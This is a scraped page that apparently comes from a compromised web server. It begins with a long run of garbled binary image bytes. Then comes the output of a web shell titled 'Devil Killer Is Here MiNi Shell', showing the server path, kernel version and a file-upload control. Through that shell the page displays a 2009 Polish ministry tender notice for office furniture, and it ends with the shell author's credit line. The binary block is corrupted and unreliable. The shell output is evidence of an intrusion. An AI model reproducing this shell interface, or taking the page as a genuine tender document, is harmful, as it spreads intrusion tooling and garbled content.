JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090320/70768-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa mebli biurowych</b><br>
<b>Numer ogłoszenia: 70768 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa mebli biurowych:
Część I przedmiotu zamowienia:
meble biuroe w kolorze olchy z melaminą w strukturze,
uchwyty w kolorze czarnym
1) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę  po prawej stronie, z szafką z trzema szufladami  zamykanymi na zamek centralny po lewej stronie - 7 szt.
2) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę 
po lewej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po prawej stronie - 7 szt.
3) Witryna - 3 szt.
4) Kontenerek na kółkach z trzema szufladami - 15 szt.
5) Kontenerek z czterema szufladami - 10 szt.
6) Szafka - 20 szt.
7) Szafa ubraniowa - 6 szt.
8) Szafa ubraniowa - 1 szt.
9) Nadstawka na szafę - 1 szt.
10) Szafa aktowa - 25 szt.
11) Nadstawka na szafę - 25 szt.
12) Nadstawka na regał - 5 szt.
13) Stolik kwadratowy - 5 szt.
14) Dostawka (1/2 koła) - 10 szt.
15) Regał otwarty - 5 szt.
16) Nadstawka na regał - 1 szt.
17) Regał otwarty - 1 szt.
18) Fotel skórzany - 5 szt.
19) Krzesło drewniane - 40 szt.

część II przedmiotu:
meble biurowe w kolorze olchy z melaminą w strukturze, 
uchwyty w kolorze czarnym
1) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę po prawej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po lewej stronie - 11 szt.
2) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę po lewej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po prawej stronie- 11 szt.
3) Dostawka (1/4 koła) - 13 szt.
4) Dostawka (1/2 koła) - 3 szt.
5) Biurko z półką wysuwaną pod blatem - 3 szt.
6) Szafa aktowa - 32 szt.
7) Nadstawka na szafę - 32 szt.
8) Szafka zamykana na zamek (1 półka, 2 pola) - 5 szt.
9) Szafka zamykana na zamek (2 półki, 3 pola) - 5 szt.
10) Kontenerek z czterema szufladami - 18 szt.
11) Szafka zamykana na zamek (1 półka, 2 pola) - 3 szt.
12) Szafka zamykana na zamek (1 półka, 2 pola) - 1 szt.
13) Stolik kwadratowy - 9 szt.
14) Regał otwarty - 2 szt.
15) Nadstawka na regał (1 półka, 2 pola) - 1 szt.
16) Krzesła drewniane - 35 szt.
17) Krzesła obrotowe - 27 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.51.61.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o niniejsze zamówienie zobowiązany jest do wniesienia wadium (przed upływem terminu składania ofert) w wysokości: 
Część I - przedmiotu zamówienia = 1 300,00 zł (słownie złotych: jeden tysiąc trzysta);
Część II - przedmiotu zamówienia = 1 300,00 zł (słownie złotych: jeden  tysiąc trzysta);
Uwaga - W przypadku, gdy Wykonawca składa ofertę na wykonanie więcej niż jednej części przedmiotu zamówienia zobowiązany jest do wniesienia wadium w wysokości sumy kwot na poszczególne części.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1 - 4 ustawy Pzp, tj.: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Uwaga - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki określone w pkt 1 - 3 musi spełniać przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.
4) nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
Uwaga  - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden 
z Wykonawców nie może podlegać wykluczeniu z postępowania.
2. Warunki szczegółowe:
W celu wykazania spełniania warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt 2 Wykonawca musi posiadać doświadczenie do wykonania zamówienia. Za posiadane doświadczenia Zamawiający uzna wykazanie przez Wykonawcę, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) w ciągu ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. 
W przedmiotowym postępowaniu Wykonawca musi wykazać, że wykonał należycie co najmniej dwie dostawy mebli biurowych, każda o wartości brutto min.:
Część I - przedmiotu zamówienia = 80 000,00 zł (słownie złotych: osiemdziesiąt tysięcy);
Część II - przedmiotu zamówienia = 80 000,00 zł (słownie złotych:  osiemdziesiąt tysięcy);
3. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego w SIWZ). Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 1 - 3 ustawy Pzp (wzór stanowi Załącznik Nr 3 do SIWZ).
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 4 ustawy Pzp (wzór stanowi Załącznik Nr 4 do SIWZ).
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) dostaw mebli biurowych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia oraz dokumenty potwierdzające należyte wykonanie tych dostaw np. protokoły odbioru, referencje.
5. Oświadczenie Wykonawcy, że oferowane krzesła  spełniają wymagania jakościowe określone przez Zamawiającego w SIWZ (wzór stanowi załącznik Nr 9 do SIWZ).   
6. Inne np.: pełnomocnictwo dla osoby podpisującej ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie to wynika z przepisów prawa lub innych dokumentów.
7. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia Prezesa RM z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605 z późn. zm.).
a). Wykonawca, o którym mowa powyżej zamiast dokumentu wskazanego ust. 3, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto likwidacji ani nie ogłoszono upadłości.
b). Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
c). Dokumenty, o których mowa w powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.nauka.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr 36).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 11:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3
00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr 36).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizacja części zamówienia zostanie współfinansowana ze środków Unii Europejskiej w ramach Pomocy Technicznej Program Operacyjny Kapitał Ludzki.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mebli biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dostawa mebli biurowych:
Część I przedmiotu zamowienia:
meble biuroe w kolorze olchy z melaminą w strukturze,
uchwyty w kolorze czarnym
1) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę  po prawej stronie, z szafką z trzema szufladami  zamykanymi na zamek centralny po lewej stronie - 7 szt.
2) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę 
po lewej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po prawej stronie - 7 szt.
3) Witryna - 3 szt.
4) Kontenerek na kółkach z trzema szufladami - 15 szt.
5) Kontenerek z czterema szufladami - 10 szt.
6) Szafka - 20 szt.
7) Szafa ubraniowa - 6 szt.
8) Szafa ubraniowa - 1 szt.
9) Nadstawka na szafę - 1 szt.
10) Szafa aktowa - 25 szt.
11) Nadstawka na szafę - 25 szt.
12) Nadstawka na regał - 5 szt.
13) Stolik kwadratowy - 5 szt.
14) Dostawka (1/2 koła) - 10 szt.
15) Regał otwarty - 5 szt.
16) Nadstawka na regał - 1 szt.
17) Regał otwarty - 1 szt.
18) Fotel skórzany - 5 szt.
19) Krzesło drewniane - 40 szt.


2. Wykonawca zobowiązany będzie do:
1) Dostarczenia mebli fabrycznie nowych, wolnych od wad fizycznych i prawnych.
2) Dostawy przedmiotu zamówienia do siedziby Zamawiającego w godzinach pracy urzędu (ul. Wspólna 1/3 i/lub w inne miejsce wskazane przez Zamawiającego na terenie Warszawy). Szczegółowe warunki dostawy zostaną doprecyzowane z Wykonawcą, którego oferta zostanie wybrana.
3) Montażu, wniesienia i ustawienia mebli w miejsce wskazane przez Zamawiającego.
3. Dodatkowe wymagania:
1) Przed realizacją przedmiotu zamówienia z Wykonawcą (którego oferta zostanie wybrana) zostanie uzgodniony odcień koloru olchy z melaminą w strukturze oraz kolor obicia tapicerskiego i elementów drewnianych.
2) Zamawiający wymaga aby Wykonawca na dostarczony przedmiot umowy udzielił 24 miesięcznej gwarancji licząc od daty podpisania (bez zastrzeżeń) Protokołu odbioru..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.51.61.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mebli biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mebli biurowych
część II przedmiotu:
meble biurowe w kolorze olchy z melaminą w strukturze, 
uchwyty w kolorze czarnym
1) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę po prawej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po lewej stronie - 11 szt.
2) Biurko z półką wysuwaną pod blatem, z miejscem na jednostkę po lewej stronie, z szafką z trzema szufladami zamykanymi na zamek centralny po prawej stronie- 11 szt.
3) Dostawka (1/4 koła) - 13 szt.
4) Dostawka (1/2 koła) - 3 szt.
5) Biurko z półką wysuwaną pod blatem - 3 szt.
6) Szafa aktowa - 32 szt.
7) Nadstawka na szafę - 32 szt.
8) Szafka zamykana na zamek (1 półka, 2 pola) - 5 szt.
9) Szafka zamykana na zamek (2 półki, 3 pola) - 5 szt.
10) Kontenerek z czterema szufladami - 18 szt.
11) Szafka zamykana na zamek (1 półka, 2 pola) - 3 szt.
12) Szafka zamykana na zamek (1 półka, 2 pola) - 1 szt.
13) Stolik kwadratowy - 9 szt.
14) Regał otwarty - 2 szt.
15) Nadstawka na regał (1 półka, 2 pola) - 1 szt.
16) Krzesła drewniane - 35 szt.
17) Krzesła obrotowe - 27 szt.

2. Wykonawca zobowiązany będzie do:
1) Dostarczenia mebli fabrycznie nowych, wolnych od wad fizycznych i prawnych.
2) Dostawy przedmiotu zamówienia do siedziby Zamawiającego w godzinach pracy urzędu (ul. Wspólna 1/3 i/lub w inne miejsce wskazane przez Zamawiającego na terenie Warszawy). Szczegółowe warunki dostawy zostaną doprecyzowane z Wykonawcą, którego oferta zostanie wybrana.
3) Montażu, wniesienia i ustawienia mebli w miejsce wskazane przez Zamawiającego.
3. Dodatkowe wymagania:
1) Przed realizacją przedmiotu zamówienia z Wykonawcą (którego oferta zostanie wybrana) zostanie uzgodniony odcień koloru olchy z melaminą w strukturze oraz kolor obicia tapicerskiego i elementów drewnianych.
2) Zamawiający wymaga aby Wykonawca na dostarczony przedmiot umowy udzielił 24 miesięcznej gwarancji licząc od daty podpisania (bez zastrzeżeń) Protokołu odbioru..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.51.61.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com